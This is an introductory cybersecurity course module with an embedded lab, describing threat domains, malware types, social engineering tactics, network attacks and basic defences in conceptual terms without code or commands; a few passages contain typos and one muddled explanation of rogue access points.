Module 1: Cybersecurity Threats, Vulnerabilities, and

Attacks
Common Threats
1.1.1 Threat Domains
With organizations facing an ever-growing number of cyber threats, it is critical
that they have robust security solutions in place. But in order to protect
themselves, organizations first need to know what vulnerabilities exist within
their threat domains. A ‘threat domain’ is considered to be an area of control,
authority or protection that attackers can exploit to gain access to a system.
There are many ways that attackers can uncover vulnerabilities and exploit
systems within a domain.

1.1.2 Types of Cyber Threats

Cyber threats can be classified into different categories. This allows
organizations to assess the likelihood of a threat occurring and understand the
monetary impact of a threat so that they can prioritize their security efforts.
Select the headings for examples of cyber threats in each of these categories.
Software Attacks
 A successful denial-of-service (DoS attack).
 A computer virus.
Software Errors
 A software bug.
 An application going offline.
 A cross-site script or illegal file server share.
Sabotage
 An authorized user successfully penetrating and compromising an
organization’s primary database.
 The defacement of an organization’s website.
Human error
 Inadvertent data entry errors.
 A firewall misconfiguration.
Theft
 Laptops or equipment being stolen from an unlocked room.
Hardware Failures
 Hard drive crashes.
Utility Interruption
 Electrical power outages.
 Water damage resulting from sprinkler failure.
Natural Disasters
 Severe storms such as hurricanes or tornados.
 Earthquakes.
 Floods.
 Fires.

1.1.3 Avatar
Remember that cybercriminals repertory is vast and ever-evolving. Sometimes,
they might combine two or more of the above tactics to increase their chances.
It is up to cybersecurity professionals to raise awareness and educate other
people in an organization about these tactics, to prevent them from falling
victim to such attacks.

1.1.4 Internal vs External Threats

Threats can originate from both within and outside of an organization, with
attackers seeking access to valuable sensitive information such as personnel
records, intellectual property, and financial data.
Internal threats are usually carried out by current or former employees and
other contract partners who accidentally or intentionally mishandle confidential
data or threaten the operations of servers or network infrastructure devices by
connecting infected media or by accessing malicious emails or websites.
The source of an external threat typically stems from amateur or skilled
attackers who can exploit vulnerabilities in networked devices or can use social
engineering techniques, such as trickery, to gain access to an organization’s
internal resources.
1.1.5 Avatar
Did you know that internal threats have the potential to cause greater damage
than external threats? This is because employees or partners working within an
organization have direct access to its premises and infrastructure devices. They
will also have insider knowledge of the organization’s network, resources and
confidential data, as well as the security countermeasures in place.

1.1.6 Know the Difference

You are worried about some potential threats that were recently reported at
@Apollo. But before you can address them, you need to understand if the
threats came from an internal or an external source.

1.1.7 Avatar
Cyber threats can spread in various ways such as through users themselves,
via devices connected to the network or via services hosted on a public or
private cloud. And don’t forget the threat of a physical attack if the right
security measures are not in place.
Let’s take a look at these in more detail.

1.1.8 User Threats and Vulnerabilities

A user domain includes anyone with access to an organization’s information
system, including employees, customers and contract partners. Users are often
considered to be the weakest link in information security systems, posing a
significant threat to the confidentiality, integrity and availability of an
organization’s data.
Select the headings to reveal more information about the most common user
threats found in many organizations.
No awareness of security
Users must be aware of and understand an organization’s sensitive data,
security policies and procedures, technologies and countermeasures that are
implemented in order to protect information and information systems.
Poorly enforced security policies
All users must be aware of and understand an organization’s security policies,
as well as the consequences of non-compliance.
Data theft
Data stolen by users can pose a significant financial threat to organizations,
both in terms of the resulting damage to their reputation and/or the legal
liability associated with the disclosure of sensitive information.
Unauthorized downloads and media
Many network and device infections and attacks can be traced back to users
who have downloaded unauthorized emails, photos, music, games, apps and
videos to their computers, networks or storage devices, or used unauthorized
media such as external hard disks and USB drives.
Unauthorized virtual private networks (VPNs)
VPNs can hide the theft of unauthorized information because the encryption
normally used to protect confidentiality can stop a network administrator from
tracking data transmission (unless they have permission to do so).
Unauthorized websites
Accessing unauthorized websites can pose a risk to a user’s data and devices,
as well as the organization itself. Often, these websites prompt users to
download scripts or plugins that contain malicious code or adware. Some of
these sites can even take over user devices like cameras and applications.
Destruction of systems, applications or data
The accidental or deliberate destruction or sabotage of systems, applications
and data poses a serious risk to all organizations. Activists, disgruntled
employees or industry competitors attempt to delete data and destroy or
misconfigure devices, to make organizational data and information systems
unavailable.
Always keep in mind that there are no technical solutions, controls or
countermeasures that will make information systems any more secure than the
behaviors and processes of the people who use these systems.

1.1.9 Threats to Devices

 Any devices left powered on and unattended pose the risk of someone
gaining unauthorized access to network resources.
 Downloading files, photos, music or videos from unreliable sources could
lead to the execution of malicious code on devices.
 Cybercriminals often exploit security vulnerabilities within software
installed on an organization’s devices to launch an attack.
 An organization’s information security teams must try to keep up to date
with the daily discovery of new viruses, worms and other malware that
pose a threat to their devices.
 Users who insert unauthorized USB drives, CDs or DVDs run the risk of
introducing malware, or compromising data stored on their device.
 Policies are in place to protect an organization’s IT infrastructure. A user
can face serious consequences for purposefully violating such policies.
 Using outdated hardware or software makes an organization’s systems
and data more vulnerable to attack.

1.1.10 Threats to the Local Area Network

The local area network (LAN) is a collection of devices, typically in the same
geographic area, connected by cables (wired) or airwaves (wireless).
Because users can access an organization’s systems, applications and data
from the LAN domain, it is critical that it has strong security and stringent
access controls.
 Unauthorized access to wiring closets, data centers and computer
rooms.
 Unauthorized access to systems, applications and data.
 Network operating system or software vulnerabilities and updates.
 Rogue users gaining unauthorized access to wireless networks.
 Exploits of data in transit.
 Having LAN servers with different hardware or operating systems makes
managing and troubleshooting them more difficult.
 Unauthorized network probing and port scanning.
 Misconfigured firewalls.

1.1.11 Threats to the Private Cloud

The private cloud domain includes any private servers, resources and IT
infrastructure available to members of a single organization via the Internet.
While many organizations feel that their data is safer in a private cloud, this
domain still poses significant security threats, including:
 Unauthorized network probing and port scanning.
 Unauthorized access to resources.
 Router, firewall or network device operating system or software
vulnerabilities.
 Router, firewall or network device configuration errors.
 Remote users accessing an organization’s infrastructure and
downloading sensitive data.

1.1.12 Threats to the Public Cloud

Where a private cloud domain hosts computing resources for a single
organization, the public cloud domain is the entirety of computing services
hosted by a cloud, service or Internet provider that are available to the public
and shared across organizations.
There are three models of public cloud services that organizations may choose
to use.
Select the arrows to find out more about these.
Software as a Service (SaaS)
This is a subscription-based model that provides organizations with software
that is centrally hosted and accessed by users via a web browser, app or other
software. In other words, this is software not stored locally but in the cloud.
Platform as a Service (PaaS)
This subscription-based model provides a platform that allows an organization
to develop, run and manage its applications on the service’s hardware, using
tools that the service provides. This platform is accessed via the public cloud.
Infrastructure as a Service (IaaS)
This subscription-based model provides virtual computing resources such as
hardware, software, servers, storage and other infrastructure components over
the Internet. An organization will buy access to them and use them via the
public cloud.

1.1.13 Avatar
While public cloud service providers do implement security controls to protect
the cloud environment, organizations are responsible for protecting their own
resources on the cloud. Therefore, some of the most common threats to the
public cloud domain include:
 Data breaches.
 Loss or theft of intellectual property.
 Compromised credentials or account hijacking.
 Social engineering attacks.
 Compliance violation.

1.1.15 Threats to Applications

The application domain includes all of the critical systems, applications and
data used by an organization to support operations. Increasingly, organizations
are moving applications such as email, security monitoring and database
management to the public cloud.
Common threats to applications include:
 Someone gaining unauthorized access to data centers, computer rooms,
wiring closets or systems.
 Server downtime during maintenance periods.
 Network operating system software vulnerabilities.
 Data loss.
 Client-server or web application development vulnerabilities.

1.1.17 Threat Complexity

Software vulnerabilities occur as a result of programming mistakes, protocol
vulnerabilities or system misconfigurations. Cybercriminals seek to take
advantage of such vulnerabilities and are becoming increasingly sophisticated
in their attack methods.
An advanced persistent threat (APT) is a continuous attack that uses elaborate
espionage tactics involving multiple actors and/or sophisticated malware to
gain access to and analyze a target’s network.
Attackers operate under the radar and remain undetected for a long period of
time, with potentially devastating consequences. APTs typically target
governments and high-level organizations and are usually well-orchestrated
and well-funded.
As the name suggests, algorithm attacks take advantage of algorithms in a
piece of legitimate software to generate unintended behaviors. For example,
algorithms used to track and report how much energy a computer consumes
can be used to select targets or trigger false alerts. They can also disable a
computer by forcing it to use up all its RAM or by overworking its central
processing unit (CPU).

1.1.18 Avatar
Many organizations rely on threat intelligence data to help them understand
their overall risk, so that they can formulate and put in place effective
preventative and response measures.
Some of this data is closed source and requires a paid subscription for access.
Other data is considered open source intelligence (OSINT) and can be accessed
from publicly available information sources. In fact, sharing threat intelligence
data is becoming more popular, with governments, universities, healthcare
sector organizations and private businesses working together to improve
everyone’s security.

1.1.19 Backdoors and Rootkits

Cybercriminals also use many different types of malicious software (known as
malware) to carry out their attacks.
Backdoor
Backdoor programs, such as Netbus and Back Orifice, are used by
cybercriminals to gain unauthorized access to a system by bypassing the
normal authentication procedures.
Cybercriminals typically have authorized users unknowingly run a remote
administrative tool program (RAT) on their machine to install a backdoor that
gives the criminal administrative control over a target computer. Backdoors
grant cybercriminals continued access to a system, even if the organization has
fixed the original vulnerability used to attack the system.
Root Kits
This malware is designed to modify the operating system to create a backdoor,
wich attackers can then use to access the computer remotely.
Most rootkits take advantage of software vulnerabilities to gain access to
resources that normally shouldn´t be accessible (privilege escalation) and
modify system files.
Rootkits can also modify system forensics and monitoring tools, making them
very hard to detect. In most cases, a computer infected by a rootkit has to be
wiped and any required software reinstalled.

1.1.20 Threat Intelligence and Research Sources

The United States Computer Emergency Readiness Team (US-CERT) and the
U.S. Department of Homeland Security sponsor a dictionary of common
vulnerabilities and exposures (CVE).
Each CVE entry contains a standard identifier number, a brief description of the
security vulnerability and any important references to related vulnerability
reports. The CVE list is maintained by a not-for-profit, the MITRE Corporation,
on its public website.
The dark web
This refers to encrypted web content that is not indexed by conventional search
engines and requires specific software, authorization or configurations to
access. Expert researchers monitor the dark web for new threat intelligence.
Indicator of compromise (IOC)
IOCs such as malware signatures or domain names provide evidence of
security breaches and details about them.
Automated Indicator Sharing (AIS)
Automated Indicator Sharing (AIS), a Cybersecurity and Infrastructure Security
Agency (CISA) capability, enables the real-time exchange of cybersecurity
threat indicators using a standardized and structured language called
Structured Threat Information Expression (STIX) and Trusted Automated
Exchange of Intelligence Information (TAXII).
Next Up...
Once a cybercriminal understands the vulnerabilities of a device, system or
network, they will go to great lengths to deceive potential victims and gain
access to sensitive information.

1.2 Deception
1.2.1 Social Engineering
Social engineering is a non-technical strategy that attempts to manipulate
individuals into performing certain actions or divulging confidential information.
Rather than software or hardware vulnerabilities, social engineering exploits
human nature, taking advantage of people’s willingness to help or preying on
their weaknesses, such as greed or vanity.
Select the arrows to find out more about some common types of social
engineering attacks.
Pretexting
This type of attack occurs when an individual lies to gain access to privileged
data. For example, an attacker pretends to need personal or financial data in
order to confirm a person’s identity.
Something for something (quid pro quo)
Quid pro quo attacks involve a request for personal information in exchange for
something, like a gift. For example, a malicious email could ask you to give
your sensitive personal details in exchange for a free vacation.
Identity fraud
This is the use of a person’s stolen identity to obtain goods or services by
deception. For example, someone has acquired your data and is attempting to
issue a credit card in your name.

1.2.2 Social Engineering Tactics

Cybercriminals rely on several social engineering tactics to gain access to
sensitive information.
Authority
Attackers prey on the fact that people are more likely to comply when
instructed by someone they perceive as an authority figure.
For example, an executive opens what looks like an official subpoena
attachment but is actually an infected PDF.
Intimidation
Cybercriminals will often bully a victim into taking an action that compromises
security.
For example, a secretary receives a call that their boss is about to give an
important presentation but the files are corrupt. The criminal on the phone
claims it’s the secretary’s fault and pressures the secretary to send across the
files immediately or risk dismissal.
Consensus
Often called ‘social proof,’ consensus attacks work because people tend to act
in the same way as other people around them, thinking that something must
be right if others are doing it.
For example, cybercriminals may publish a social media post about a ‘business
opportunity’ and get dozens of legitimate or illegitimate accounts to comment
on its validity underneath, which encourages unsuspecting victims to make a
purchase.
Scarcity
A well known marketing tactic, scarcity attacks work because attackers know
that people tend to act when they think there is a limited quantity of something
available.
For example, someone receives an email about a luxury item being sold for
very little money, but it states that there are only a handful available at this
price, in an effort to spur the unsuspecting victim into taking action.
Urgency
Similarly, people also tend to act when they think there is a limited time to do
so.

For example, cybercriminals promote a fake time-limited shipping offer to try

and prompt victims to take action quickly.
Familiarity
People are more likely to do what another person asks if they like this person.
Therefore, attackers will often try to build a rapport with their victim in order to
establish a relationship. In other cases, they may clone the social media profile
of a friend of yours, in order to get you to think you are speaking to them.
Trust
Building trust in a relationship with a victim may require more time to establish.
For example, a cybercriminal disguised as a security expert calls the
unsuspecting victim to offer advice. When helping the victim, the ‘security
expert’ discovers a ‘serious error’ that needs immediate attention. The solution
provides the cybercriminal with the opportunity to violate the victim’s security.

1.2.3 Avatar
Remember that cybercriminals repertory is vast and ever-evolving. Sometimes,
they might combine two or more of the above tactics to increase their chances.
It is up to cybersecurity professionals to raise awareness and educate other
people in an organization about these tactics, to prevent them from falling
victim to such attacks.

1.2.5 Avatar
Most cyber attacks involve some form of deception. Let’s take a look at some of
these.

1.2.6 Shoulder Surfing and Dumpster Diving

Shoulder surfing is a simple attack that involves observing or literally looking
over a target’s shoulder to gain valuable information such as PINs, access
codes or credit card details. Criminals do not always have to be near their
victim to shoulder surf — they can use binoculars or security cameras to obtain
this information.
This is one reason why an ATM screen can only be viewed at certain angles.
These types of safeguards make shoulder surfing much more difficult.
You may have heard of the phrase, ‘one man's trash is another man's treasure.’
Nowhere is this more true than in the world of dumpster diving — the process
of going through a target's trash to see what information has been thrown out.
This is why documents containing sensitive information should be shredded or
stored in burn bags until they are destroyed by fire after a certain period of
time.

1.2.7 Impersonation and Hoaxes

Cybercriminals have many other deception techniques to help them succeed.
Impersonation
Is the act of tricking someone into doing something they would not ordinarily
do by pretending to be someone else. For example, a cybercriminal posing as
an IRS employee, recently targeted taxpayers, telling the victims that they
owed money that had to be paid immediately via wire transfer – or risk arrest.
Criminals can also use impersonation to attack others. For example, they can
pose as their victim online and post on websites or social media pages to
undermine the victim his credibility.
Hoaxes
A hoax is an act intended to deceive or trick someone, and can cause just as
much disruption as an actual security breach.
For example, a message that warns of a non existent virus threat on a device
and asks the recipient to share this information with everyone they know. This
hoax elicits a user reaction , creating unnecessary fear and irrational behavior
that is perpetuated through email and social media.

1.2.8 Piggybacking and Tailgating

Piggybacking or tailgating occurs when a criminal follows an authorized person
to gain physical entry into a secure location or a restricted area. Criminals can
achieve this by:
 Giving the appearance of being escorted into the facility by an
authorized person.
 Joining and pretending to be part of a large crowd that enters the facility.
  Targeting an authorized person who is careless about the rules of the
facility.
One way of preventing this is to use two sets of doors. This is sometimes
referred to as a mantrap and means individuals enter through an outer door,
which must close before they can gain access through an inner door.

1.2.9 Other Methods of Deception

Be aware that attackers have many more tricks up their sleeve to deceive their
victims.
Invoice scam
Fake invoices are sent with the goal of receiving money from a victim by
prompting them to put their credentials into a fake login screen. The fake
invoice may also include urgent or threatening language.
Watering hole attack
A watering hole attack describes an exploit in which an attacker observes or
guesses what websites an organization uses most often, and infects one or
more of them with malware.
Typosquatting
This type of attack relies on common mistakes such as typos made by
individuals when inputting a website address into their browser. The incorrect
URL will bring the individuals to a legitimate-looking website owned by the
attacker, whose goal is to gather their personal or financial information.
Prepending
Attackers can remove the ‘external’ email tag used by organizations to warn
the recipient that an email has originated from an external source. This tricks
individuals into believing that a malicious email was sent from inside their
organization.
Influence campaigns
Often used in cyberwarfare, influence campaigns are usually very well
coordinated and blend various methods such as fake news, disinformation
campaigns and social media posts.

1.2.11 Defending Against Deception

Organizations need to promote awareness of social engineering tactics and
properly educate employees on prevention measures. Here are some top tips.
 Never disclose confidential information or credentials via email, chat,
text messages, in person or over the phone to unknown parties.
 Resist the urge to click on enticing emails and web links.
 Be wary of uninitiated or automatic downloads.
  Establish and educate employees on key security policies.
 Encourage employees to take ownership of security issues.
 Do not give in to pressure by unknown individuals.

Lab - Explore Social Engineering Techniques

Objectives

Part 1: Explore Social Engineering Techniques

Part 2: Create a Cybersecurity Awareness Poster

Introduction

Cybersecurity is critical because it involves protecting unauthorized access to sensitive

data, personally identifiable information (PII), protected health information (PHI), personal
information, intellectual property (IP), and sensitive systems. Social engineering is a broad
range of malicious activities accomplished by psychologically manipulating people into
performing actions or divulging confidential information. In this lab, you will explore
social engineering techniques, sometimes called human hacking, which is a broad category
for different types of attacks.

Required Resources

PC or mobile device with internet access

Background / Scenario

Recent research reveals that the most common types of cyberattacks are becoming more
sophisticated, and the attack targets are growing. The purpose of an attack is to steal
information, disable systems or critical services, disrupt systems, activities, and operations.
Some attacks are designed to destroy information or information systems, maliciously
control a computing environment or its infrastructure, or destroy the integrity of data and/or
information systems. One of the most effective ways an attacker can gain access to an
organization’s network is through simple deception. In the cybersecurity world this is call
social engineering.

Social Engineering Attacks

Social engineering attacks are very effective because people want to trust other people and
social engineering attacks are not the kind of attack that the average user guards against;
users are concerned with botnets, identity theft or ransomware. These are big external
threats, so they do not think to question what seems to be a legitimate-looking message.

Baiting
Baiting relies on the curiosity or greed of the victim. What distinguishes baiting from other
types of social engineering is the promise of an item or good that hackers use to entice
victims. Baiters may offer users free music or movie downloads if the users surrender their
login credentials to a certain site. Baiting attacks are not restricted to online schemes.
Attackers can exploit human curiosity with physical media like USB drives.

Shoulder Surfing

Shoulder surfing is literally looking over someone's shoulder to get information. Shoulder
surfing is an effective way to get information in crowded places because it is relatively easy
to stand next to someone and watch as they fill out a form or enter a PIN number at an
ATM machine. Shoulder surfing can also be done long distance with the aid of modern cell
phones, binoculars, or other vision-enhancing devices. To prevent shoulder surfing, experts
recommend that you shield paperwork or your keypad from view by using your body or
cupping your hand. There are even screen shields that make shoulder surfing much more
difficult.

Pretexting

Pretexting is using deception to create a scenario to convince victims to divulge

information they should not divulge. Pretexting is often used against organizations that
retain client data, such as financial data, credit card numbers, utilities account numbers, and
other sensitive information. Pretexters often request information from individuals in an
organization by impersonating a supervisor, helpdesk clerk, or client, usually by phone,
email, or text.

Phishing, spear phishing, and whaling attacks

In phishing attacks, the attackers try to obtain personal information or data, like username,
password, and credit card details, by disguising themselves as trustworthy entities. Phishing
is mainly conducted through emails and phone calls. Spear phishing is more targeted
version of the phishing in which an attacker chooses specific individuals or enterprises and
then customizes their phishing attack to their victims to make it less conspicuous. Whaling
is when the specific target is a high-profile employee such as a CEO or CFO.

Scareware and ransomware

Ransomware attacks involve injecting malware that encrypts a victim’s critical data. The
cyber criminals request a ransom to be paid to decrypt the data. However, even if a ransom
is paid, there is no guarantee the cyber criminals will decrypt the information. Ransomware
is one of the fastest growing types of cyberattack and has affected thousands of financial
organizations, government agencies, healthcare facilities, even schools and our education
systems.

Scareware takes advantage of a user’s fear by coaxing them into installing fake antivirus
software.
Tailgating

Tailgating tricks the victim into helping the attacker gain unauthorized access into the
organization’s physical facilities. The attacker seeks entry into a restricted area where
access is controlled by software-based electronic devices or human guards. Tailgating can
also involve the attacker following an employee closely to pass through a locked door
before the door locks behind the employee.

Dumpster diving

In the world of social engineering, dumpster diving is a technique used to retrieve discarded
information thrown in the trash to carry out an attack on a person or organization. Dumpster
diving is not limited to searching through the trash for obvious treasures like access codes
or passwords written down on sticky notes, it can also involve electronic information left
on desktops, or stored on USB drives.

Part 1. Explore Social Engineering Techniques

Step 1: Explore Baiting, Shoulder Surfing, and Pretexting.

The National Support Center for Systems Security and Information Assurance (CSSIA)
hosts a Social Engineering Interactive activity. The current link to the site
is https://www.cssia.org/social_engineering/. However, if the link changes, try searching
for #CSSIA Social Engineering Interactive#.

Click Next in the interactive activity, and then use the content to answer the following
questions.

What is baiting? Did you click on the USB drive? What happened to the victim’s system?

Answer Area

Show Answer

What is Shoulder Surfing? What device was used to perform the shoulder surfing? What
information was gained?

Answer Area

Show Answer

What is Pretexting? What type of information did the cybercriminal request? Would you
fall victim?

Answer Area
Show Answer

Step 2: Explore Phishing, Spear Phishing, and Whaling

Phishing is designed to get victims to click on links to malicious websites, open

attachments that contain malware, or reveal sensitive information. Use the interactive
activity to explore different phishing techniques.

In this phishing example, what is the ploy the attacker uses to trick the victim to visit the
trap website? What is the trap website used for?

Answer Area

Show Answer

What is the difference between phishing and spear phishing or whaling?

Answer Area

Show Answer

Step 3: Explore Scareware and Ransomware

Scareware is when victims are deceived into thinking that their system is infected with
malware and receive false alarms prompting them to install software that is not needed or is
itself malware. Ransomware is a type of malware that threatens to publish the victim's data
or encrypts the victim’s data preventing access or the ability to use the data.

Victims are prevented from accessing their system or personal files until they make a
ransom payment to regain access.

What data does the attacker claim to have in this example? Would you fall for this
deception?

Answer Area

Show Answer

What is the attacker requesting the victim do to get the data back?

Answer Area

Show Answer

What is tailgating?
Answer Area

Show Answer

Give three ways to prevent social engineering attacks?

Answer Area

Show Answer

Part 2. Create a Cybersecurity Awareness Poster

Use PowerPoint to create a poster that will make others aware of the different
social engineering techniques used to gain unauthorized access to an organization
or the organization’s data.

Pick from: Baiting, Shoulder Surfing, Pretexting, Phishing, Scareware,

Ransomware, Tailgating, or Dumpster Diving.

The poster should depict the techniques used and how users can avoid one of
these social engineering attacks. Also include directions on where the poster
should be placed within the organization.

1.3 Cyber Attacks

1.3.1 What's the Difference?
Cybercriminals use many different types of malicious software, or malware, to
carry out attacks. Malware is any code that can be used to steal data, bypass
access controls or cause harm to or compromise a system.
Viruses
A virus is a type of computer program that, when executed, replicates and
attaches itself to other files, such as a legitimate program, by inserting its own
code into it. Some viruses are harmless yet others can be destructive, such as
those that modify or delete data. Most viruses require end-user interaction to
initiate activation, and can be written to act on a specific date or time.
Viruses can be spread through removable media such as USB flash drives,
Internet downloads and email attachments. The simple act of opening a file or
executing a specific program can trigger a virus. Once a virus is active, it will
usually infect other programs on the computer or other computers on the
network. Viruses mutate to avoid detection.
For example, the Melissa virus was released in 1999 and spread via email,
affecting tens of thousands of users and causing an estimated $1.2 billion in
damage.
Worms
A worm is a malicious software program that replicates by independently
exploiting vulnerabilities in networks. Unlike a virus, which requires a host
program to run, worms can run by themselves. Other than the initial infection
of the host, they do not require user participation and can spread very quickly
over the network, usually slowing it down.
Worms share similar patterns: they exploit system vulnerabilities, they have a
way to propagate themselves and they all contain malicious code (payload) to
cause damage to computer systems or networks.
Worms are responsible for some of the most devastating attacks on the
Internet. In 2001, the Code Red worm had infected over 300,000 servers in just
19 hours.
Trojan horse
A Trojan horse is malware that carries out malicious operations by masking its
true intent. It might appear legitimate but is, in fact, very dangerous. Trojans
exploit the privileges of the user who runs them.

Unlike viruses, Trojans do not self-replicate but often bind themselves to non-
executable files, such as image, audio or video files, acting as a decoy to harm
the systems of unsuspecting users.

1.3.2 Logic Bombs

A logic bomb is a malicious program that waits for a trigger, such as a specified
date or database entry, to set off the malicious code. Until this trigger event
happens, the logic bomb will remain inactive.
Once activated, a logic bomb implements a malicious code that causes harm to
a computer in various ways. It can sabotage database records, erase files and
attack operating systems or applications.
Cybersecurity specialists have recently discovered logic bombs that attack and
destroy the hardware components in a device or server, including the cooling
fans, central processing unit (CPU), memory, hard drives and power supplies.
The logic bomb overdrives these components until they overheat or fail.

1.3.3 Ransomware
This malware is designed to hold a computer system or the data it contains
captive until a payment is made.
Ransomware usually works by encrypting your data so that you cannot access
it. According to ransomware claims, once the ransom is paid via an untraceable
payment system, the cybercriminal will supply a program that decrypts the
files or send an unlock code — but in reality, many victims do not gain access
to their data even after they have paid.
Some versions of ransomware can take advantage of specific system
vulnerabilities to lock it down. Ransomware is often spread through phishing
emails that encourage you to download a malicious attachment, or through a
software vulnerability.

1.3.4 Denial of Service Attacks

Denial of service (DoS) attacks are a type of network attack that is relatively
simple to conduct, even for an unskilled attacker. They are a major risk as they
usually result in some sort of interruption to network services, causing a
significant loss of time and money. Even operational technologies, hardware or
software that controls physical devices or processes in buildings, factories or
utility providers, are vulnerable to DoS attacks, which can cause a shutdown, in
extreme circumstances.
Overwhelming quantity of traffic
This is when a network, host or application is sent an enormous amount of data
at a rate which it cannot handle. This causes a slowdown in transmission or
response, or the device or service to crash.
Maliciously formatted packets
A packet is a collection of data that flows between a source and a receiver
computer or application over a network, such as the internet. When a
maliciously formatted packet is sent, the receiver will be unable to handle it.
For example, if an attacker forwards packets containing errors or improperly
formatted packets that cannot be identified by an application, this will cause
the receiving device to run very slowly or crash.

1.3.5 Avatar
Distributed denial of service (DDoS) attacks are similar but originate from
multiple coordinated sources. Here is how this happens:
1. An attacker builds a network (botnet) of infected hosts called zombies,
which are controlled by handler systems.
2. The zombie computers constantly scan and infect more hosts, creating
more and more zombies.
3. When ready, the hacker will instruct the handler systems to make the
botnet of zombies carry out a DDoS attack.

1.3.6 Domain Name System

There are many essential technical services needed for a network to operate —
such as routing, addressing and domain naming. These are prime targets for
attack.
Domain reputation
The Domain Name System (DNS) is used by DNS servers to translate a domain
name, such as www.cisco.com, into a numerical IP address so that computers
can understand it. If a DNS server does not know an IP address, it will ask
another DNS server.
An organization needs to monitor its domain reputation, including its IP
address, to help protect against malicious external domains.
DNS spoffing
DNS spoofing or DNS cache poisoning is an attack in which false data is
introduced into a DNS resolver cache — the temporary database on a
computer’s operating system that records recent visits to websites and other
Internet domains.
These poison attacks exploit a weakness in the DNS software that causes the
DNS servers to redirect traffic for a specific domain to the attacker’s computer.
Domain hijacking
When an attacker wrongfully gains control of a target’s DNS information, they
can make unauthorized changes to it. This is known as domain hijacking.
The most common way of hijacking a domain name is to change the
administrator’s contact email address through social engineering or by hacking
into the administrator's email account. The administrator’s email address can
be easily found via the WHOIS record for the domain, which is of public record.
Uniform resource location (URL)
A uniform resource locator (URL) is a unique identifier for finding a specific
resource on the Internet. Redirecting a URL commonly happens for legitimate
purposes.
For example, you have logged into an eLearning portal to begin this
Cybersecurity Essentials course. If you log out of the portal and return to it
another time, the portal will redirect you back to the login page.
It is this type of functionality that attackers can exploit. Instead of taking you to
the eLearning login page, they can redirect you to a malicious site.

1.3.7 Layer 2 Attacks

Layer 2 refers to the data link layer in the Open Systems Interconnection (OSI)
data communication model.
This layer is used to move data across a linked physical network. IP addresses
are mapped to each physical device address (also known as media access
control (MAC) address) on the network, using a procedure called address
resolution protocol (ARP).
In its simplest terms, the MAC address identifies the intended receiver of an IP
address sent over the network, and ARP resolves IP addresses to MAC
addresses for transmitting data.
Attackers often take advantage of vulnerabilities in this layer 2 security.
Spoofing
Spoofing, or poisoning, is a type of impersonation attack that takes advantage
of a trusted relationship between two systems.
 MAC address spoofing occurs when an attacker disguises their device as
a valid one on the network and can therefore bypass the authentication
process.
 ARP spoofing sends spoofed ARP messages across a LAN. This links an
attacker’s MAC address to the IP address of an authorized device on the
network.
 IP spoofing sends IP packets from a spoofed source address in order to
disguise it.

MAC Flooding
Devices on a network are connected via a network switch by using packet
switching to receive and forward data to the destination device. MAC flooding
compromises the data transmitted to a device. An attacker floods the network
with fake MAC addresses, compromising the security of the network switch.

1.3.9 Man-in-the-Middle and Man-in-the-Mobile Attacks

Attackers can intercept or modify communications between two devices to
steal information from or to impersonate one of the devices.
Man-in-the-Middle (MitM)
A MitM attack happens when cybercriminal takes control of a device without
the user his knowledge. With this level of access, an attacker can intercept,
manipulate and relay false information between the sender and the intended
destination.
Man-in-the-Mobile (MitMo)
A variation of man-in-the-middle, MitMo is a type of attack used to take control
over a user his mobile device. When infected, the mobile device is instructed to
exfiltrate user-sensitive information and send it to the attackers. ZeuS is one
example of a malware package with MitMo capabilities. It allows attackers to
quietly capture two-step verification SMS messages sent to users.

1.3.10 Avatar
A replay attack occurs when an attacker captures communication between two
hosts and then retransmits the message to the recipient, to trick the recipient
into doing what the attacker wants, thus circumventing any authentication
mechanisms.

1.3.11 Zero-Day Attacks

A zero-day attack or zero-day threat exploits software vulnerabilities before
they become known or before they are disclosed by the software vendor.
A network is extremely vulnerable to attack between the time an exploit is
discovered (zero hour) and the time it takes for the software vendor to develop
and release a patch that fixes this exploit.
Defending against such fast-moving attacks requires network security
professionals to adopt a more sophisticated and holistic view of any network
architecture.

1.3.12 Keyboard Logging

As the name suggests, keyboard logging or keylogging refers to recording or
logging every key struck on a computer’s keyboard.
Cybercriminals log keystrokes via software installed on a computer system or
through hardware devices that are physically attached to a computer, and
configure the keylogger software to send the log file to the criminal. Because it
has recorded all keystrokes, this log file can reveal usernames, passwords,
websites visited and other sensitive information.
Many anti-spyware suites can detect and remove unauthorized key loggers.

1.3.13 Avatar
It is important to note that keylogging software can be legitimate. Many
parents use it to keep an eye on their children’s internet behavior.
1.3.15 Defending Against Attacks
Organizations can take several steps to defend against various attacks. These
include the following:
 Configure firewalls to remove any packets from outside the network that
have addresses indicating that they originated from inside the network.
 Ensure patches and upgrades are current.
 Distribute the workload across server systems.
 Network devices use Internet Control Message Protocol (ICMP) packets to
send error and control messages, such as whether or not a device can
communicate with another on the network. To prevent DoS and DDoS
attacks, organizations can block external ICMP packets with their
firewalls.

1.4 Wireless and Mobile Device Attacks

1.4.1 Avatar
The widespread use of the Internet and mobile devices means that now, more
than ever before, we can communicate and work on the go, without the need
for cables and wires! But this also breeds more opportunity for cybercriminals
to access the sensitive information they are after.

1.4.2 Grayware and SMiShing

Grayware is any unwanted application that behaves in an annoying or
undesirable manner. And while grayware may not carry any recognizable
malware, it may still pose a risk to the user by, for example, tracking your
location or delivering unwanted advertising.
Authors of grayware typically maintain legitimacy by including these ‘gray’
capabilities in the small print of the software license agreement. This factor
poses a growing threat to mobile security in particular, as many smartphone
users install mobile apps without really considering this small print.
Short message service phishing or SMiShing is another tactic used by attackers
to trick you. Fake text messages prompt you to visit a malicious website or call
a fraudulent phone number, which may result in malware being downloaded
onto your device or personal information being shared.

1.4.3 Rogue Access Points

A rogue access point is a wireless access point installed on a secure network
without explicit authorization. Although it could potentially be set up by a well-
intentioned employee looking for a better wireless connection, it also presents
an opportunity for attackers looking to gain access to an organization’s
network.
An attacker will often use social engineering tactics to gain physical access to
an organization’s network infrastructure and install the rogue access point.
Also known as a criminal’s access point, the access point can be set up as a
MitM device to capture your login information.
This works by disconnecting the rogue access point, which triggers the network
to send a deauthentication frame to disassociate the access point. This process
is then exploited by spoofing your MAC address and sending a deauthentication
data transmission to the wireless access point.

An evil twin attack describes a situation where the attacker’s access point is set up to look
like a better connection option. Once you connect to the evil access point, the attacker can
analyze your network traffic and execute MitM attacks.

1.4.4 Radio Frequency Jamming

Wireless signals are susceptible to electromagnetic interference (EMI), radio frequency

interference (RFI) and even lightning strikes or noise from fluorescent lights.

Attackers can take advantage of this fact by deliberately jamming the transmission of a
radio or satellite station to prevent a wireless signal from reaching the receiving station.
